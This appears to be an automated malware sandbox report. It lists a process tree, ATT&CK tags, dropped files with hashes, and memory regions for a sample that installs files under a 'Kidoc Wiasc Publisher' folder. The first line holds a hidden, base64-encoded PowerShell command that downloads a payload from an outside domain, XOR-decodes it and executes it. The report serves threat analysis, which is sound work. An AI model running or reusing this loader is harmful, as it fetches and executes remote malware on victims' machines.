C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AZwBvAHQAcgB5AC0AZwBvAHQAcgB5AC4AYwBvAG0ALwAyADUAMAA2AHMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 18164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 18204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 18244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1896 -ip 18961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1896 -ip 18961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1896 -ip 18961⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\ATBroker.exeC:\Windows\System32\ATBroker.exe /start osk1⤵
-
C:\Windows\System32\osk.exe"C:\Windows\System32\osk.exe"2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004DC1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb1e4eab58,0x7ffb1e4eab68,0x7ffb1e4eab782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2112 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4356 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4512 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4504 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4968 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Event Triggered Execution
2Accessibility Features
1Installer Packages
1Privilege Escalation
Event Triggered Execution
2Accessibility Features
1Installer Packages
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e577b8c.rbsFilesize
22KB
MD5320efff92837a6d5c83e73a403e67fbb
SHA17eb8004b822fb5b12073014ef3be63120070534b
SHA256e85e262cb9e7e72d0c2a1c1c7ae91a70de5d1fa27789e7966546e8b760c86bd3
SHA512144716d471d1737d0340feae6a3bfd5d5c4477b370c1a09886c1dab0e041c257548e3bf0fc9a1d12aa1e21256d30de36828eb1820666031e2ddcefbda734b5b7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\585535ac-e32f-4200-95eb-4eee540a530e.tmpFilesize
281KB
MD5ff2359bdc2252e49224218ad007ecb16
SHA18bafef81682129e355c0e1adf804d7b4e5c3f5f2
SHA256f889a8851ba217e33662fa912373f3c33109902c297a0f18f3835daf5dbf5d11
SHA512aeca92f428dbcde8d591e158dc47d0189ffedbdaccc19ca7a721f124401f9c8f985319051f05c1f3b226e98a31800a7dc8bd6c0d24209f41682be971507802e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD54bae4815fe57d527269780614790dc53
SHA12d339f8e1318fe7997e1ad967ecdaa8f30f9f54b
SHA2561a9addd9e50a430a2490ddc23961128b6795f08366b643d47f50ae5c4fd3553b
SHA512ebddd637aa614664be31eb1a2989b3fcf3955b57be89be516c19c3efdb93b9458a66388967bc3be26d0e8b75501343c6f164ca201cc180246c5297c50c568a55
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
356B
MD5f839fc14286e670f18f191b5d60071e1
SHA177858687c31bfd1dc536319939db1bdfe45c7de8
SHA25660ae6a6101369f4feb6c505cb730cbc7f3445dc21acb2831f9063b9eeb5f39f0
SHA5125e5969115224fcc284bdbe64243fd2025b6864918b5222e3d90ae3976b6626be5ad05f68b19a1d1b2d0aa6d92bb1eaa3f92cc15ec99c211041fc0a1c0fec1228
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD52904edfb1359d14bddd443b0ff6abe7b
SHA1a99cf1df0539c2fddd431a7e26c806cd53288e7d
SHA256bf7def095492062a9e33f6227c21bcf34e7c9b6101c762bc768ff21f109dd950
SHA5127d2833bea1a92e43551c89a5c29a3386cff2ca7381c9b70e3e31aa9fc15155ff45deef89aab75d04b494939135f4a54ee7016306402a48d06d310b99f367d5ed
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
16KB
MD56baf3d11062b6c240b20ffe12398a045
SHA15bcf0dce49c59beac77c8a5e9d3f87172ba824e4
SHA256e2b1bf327253208670a4bdb4dcd9a6fe3217d881bc3a1e504a082c36f19c5294
SHA512ad6f01b2bef29c83fcfb109c7ebf57bcba97c07a14cbdc29bed1bd7c7b4de70cbbf69c8e282f705a5a37b0a87d626bc46aa5d26e4f508dcd71f0a6a210d2ca92
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5a74887034b3a720c50e557d5b1c790bf
SHA1fb245478258648a65aa189b967590eef6fb167be
SHA256f25b27187fad2b82ac76fae98dfdddc1c04f4e8370d112d45c1dd17a8908c250
SHA512888c3fceb1a28a41c5449f5237ca27c7cbd057ce407f1542973478a31aa84ce9b77943130ca37551c31fa7cd737b9195b7374f886a969b39148a531530a91af3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD564f055a833e60505264595e7edbf62f6
SHA1dad32ce325006c1d094b7c07550aca28a8dac890
SHA2567172dc46924936b8dcee2d0c39535d098c2dbf510402c5bbb269399aed4d4c99
SHA51286644776207d0904bc3293b4fec2fa724b8b3c9c3086cd0ef2696027ab3d840a8049b6bde3464c209e57ffa83cbc3df6115500fbe36a9acb222830c1aac4dc7a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002Filesize
42KB
MD5f7189700993d4198ee96bd6af5569539
SHA11ad2e11bb23ac04c9eebba69fe755fb27fcda164
SHA2562447d53bd765b1f2c752ffda92b6f9a1dcabda1e4edc4d7496797f6cefdebf23
SHA5123b5522068842502f5f6dcb6678248746eabdcdeb25e21d21fb0c9e446b75eb97077f15be7ca8e5b04abd4094bc7cc8ac8452c74a946d369614ee4e77a91753b5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
1KB
MD51a808ff2bacdf9394dd940e2dfc195fb
SHA12f85130ca23bc1c3a5c4d91b990b1ec718c9801e
SHA2563896106fb49253fd46bd32ae262d0d6b56096116f0f3458ae56198a5299a932f
SHA5122310fefb4a2f0783b7ec4cc042e674b4e82dae76966df6c591c90e2ac0ebdcc8b2160a85c40d8e79326647100ae72c91fcd709cb629a3c18c742c627ea50a30c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
764B
MD51e2f1192bb5150f9525640bff75a053a
SHA18a12cf548c4e32af30e416eb3c97f95e465868ab
SHA256836b323f070c4c7c667bd0d02613385acbb8d7aaa31f4536633ef69ff25d82b3
SHA512b41a953e998ead0df9002a9149a17e924ed1ec3896bca3f4063e1c7732ac3aea5ab07ea0605fed4cf7f973c10eb007a37eecb5db1dfa0cbbdb91d76b29056f2e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD556c7aeab1c0a379009d134bd6563a0e9
SHA1f1f2d97458d6409c293d17bd4d48cb2b9c5396c3
SHA256f13708a48fba65a921855382621a5f2e4960566459a6396728d82dccbf216428
SHA51254c36115f0ba37caf5af75cf0239672f66bf113982ff9c47ee2ec88be978cb54164e94529be319075dbef7b0e698c3871c118d526f3585e0d78dace3925d50cc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5161ea1e5ea613d78ec3ddff2c82efc8f
SHA1d47588a27b945630ea8724829aa1935fc49a58ab
SHA2567ef406720866e48ad958bc4d51bfa0c4f8a27656954db532a15f99161e2bcd4f
SHA512b70f56a08a44308d1f7de0ac8d94d29301137aa3030a0b089ade49c8b0a62bbcf063043a8505dd382174330ccbf1a8734d71f839121fbe9e6494696686240b21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD54349994a1bd73fb86adc74b0e9ceabd1
SHA1d08c84d55d1b7b56095066f5a953e644ac4b9485
SHA25692fa6c8135f15b45c56912deefdf1fda0c8a165348018b7dc5ce2556bc4c8361
SHA512ef3f18f6b7d86cfd0063e8673888d6c0c917e75a046cd6c8f5316dbdf071d64b6a816276d8d10e9b49bc50ee9928f458303ad34f8dd98ba9e460e1873a4002e7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD56c9ac705121868bd09a56deb88432ed7
SHA17cceb6c78f942cd1ddefd5f6fa54cb540c760d52
SHA256d8775c1b9acaa8c3bde824eda4c0a497ee903ae892a13beeb6d6378915822d49
SHA5124e5d53510794d882fd44ae7af01e6b25bacfd62746f4299557b9a4c2239cb14a7c6378e360948d6fe647ac88325c964ed8a3a167bbd0585f159d5af47b270601
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD59dff03c3ab998a0e28275569c6462aad
SHA17a0b442672bde2847fbb4b11e775c46f398e77d1
SHA256cb07cbd97c4eca5e1ab7dde87372aeb0d9fa11fafe8500bec640a4a45f3b4421
SHA51263750dc671bf27ad00f7ce0e0aacf929b03b0fa5146b9003b89300c4dad71d1b5a2d8a59e53d287b1fe4bcabd39a6adc10c458706da612f27463424250c484ff
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v4uobbek.zbr.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\UnRAR.exeFilesize
494KB
MD598ccd44353f7bc5bad1bc6ba9ae0cd68
SHA176a4e5bf8d298800c886d29f85ee629e7726052d
SHA256e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\ruw9eigh.rarFilesize
373KB
MD53bb1ffe94c9dbb62a7d25f3c284a8b0a
SHA13252e94a08282832877209a21f9635454c9214e4
SHA25661317fbab24ad8b0c043c391b501a8c2850c0e82a466b7c6ccadf9cf1fcd78e9
SHA51292adcc8abf1d5575c668fac7470321160519000976c044b72f3e4d79ff1571b72d9adf4689e0608d8bbe121b52a58c32f2e8825980fb8285a7383dab77ca5127
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\steamerrorreporter64.exeFilesize
639KB
MD5fd3ce044ac234fdab3df9d7f492c470a
SHA1a74a287d5d82a8071ab36c72b2786342d83a8ef7
SHA2560a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba
SHA51286d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\tier0_s64.dllFilesize
386KB
MD57e60404cfb232a1d3708a9892d020e84
SHA131328d887bee17641608252fb2f9cd6caf8ba522
SHA2565a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766
SHA5124d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\vstdlib_s64.dllFilesize
995KB
MD5c8d22143c0ea5feb023abe4074e4a926
SHA14f857d5614b79ca337b5bce9292e7f1cad7cc934
SHA2565d7936ac0a5dca5e397e1540a1d5e36bf16fda618f5fb096aec20c10999e853c
SHA512cae75aac582c2a232cfae37bdb8184ba1f2db1ac1fb634032db57ea8e0fc448ee23c3ca300ba0db831d6eb656e1fd6652e05b1fae182cda9099dd06ce29f8b18
-
C:\Windows\Installer\MSI7BD7.tmpFilesize
738KB
MD5b158d8d605571ea47a238df5ab43dfaa
SHA1bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA51256aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591
-
C:\Windows\Installer\MSI7C96.tmpFilesize
1.1MB
MD51a2b237796742c26b11a008d0b175e29
SHA1cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA25681e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA5123135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5
-
C:\Windows\Installer\MSI840C.tmpFilesize
364KB
MD554d74546c6afe67b3d118c3c477c159a
SHA1957f08beb7e27e657cd83d8ee50388b887935fae
SHA256f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f
-
C:\Windows\Installer\e577b89.msiFilesize
25.2MB
MD53d87a0e5517c9a8fc4adde50bafe7c76
SHA1a1ba3b688dcb9b17ed1d430f3032e2884a0565e4
SHA25649dc002fa1a0a1e33621a7d9340fb7bd0ac8b9834fc5958823d1f2bed6fa5956
SHA512ebadfdc465dc5c32c854931a9f8712320cfc3752e04b3fec56a1b103c6f225c1de0c6892b1cd90b362f56d38685b8d5851e2cbefdf3291f8389b5cea2e337042
-
\??\pipe\LOCAL\crashpad_948_IJGTPDKMOTGBOIIDMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1548-185-0x0000000000A90000-0x0000000000A99000-memory.dmpFilesize
36KB
-
memory/1548-190-0x00000000772A0000-0x00000000774F2000-memory.dmpFilesize
2.3MB
-
memory/1548-188-0x00007FFB3F840000-0x00007FFB3FA49000-memory.dmpFilesize
2.0MB
-
memory/1548-187-0x0000000002760000-0x0000000002B60000-memory.dmpFilesize
4.0MB
-
memory/1896-182-0x00007FFB3F840000-0x00007FFB3FA49000-memory.dmpFilesize
2.0MB
-
memory/1896-184-0x00000000772A0000-0x00000000774F2000-memory.dmpFilesize
2.3MB
-
memory/1896-181-0x0000000004720000-0x0000000004B20000-memory.dmpFilesize
4.0MB
-
memory/1896-192-0x0000000000F90000-0x0000000000FB8000-memory.dmpFilesize
160KB
-
memory/1896-180-0x0000000004720000-0x0000000004B20000-memory.dmpFilesize
4.0MB
-
memory/1896-156-0x0000000000F90000-0x0000000000FB8000-memory.dmpFilesize
160KB
-
memory/1896-154-0x0000000000F90000-0x0000000000FB8000-memory.dmpFilesize
160KB
-
memory/1896-155-0x0000000000F90000-0x0000000000FB8000-memory.dmpFilesize
160KB
-
memory/3360-163-0x000001D6591D0000-0x000001D6591F2000-memory.dmpFilesize
136KB
-
memory/4172-151-0x000001AE41720000-0x000001AE41745000-memory.dmpFilesize
148KB
-
memory/4172-150-0x000001AE41710000-0x000001AE41711000-memory.dmpFilesize
4KB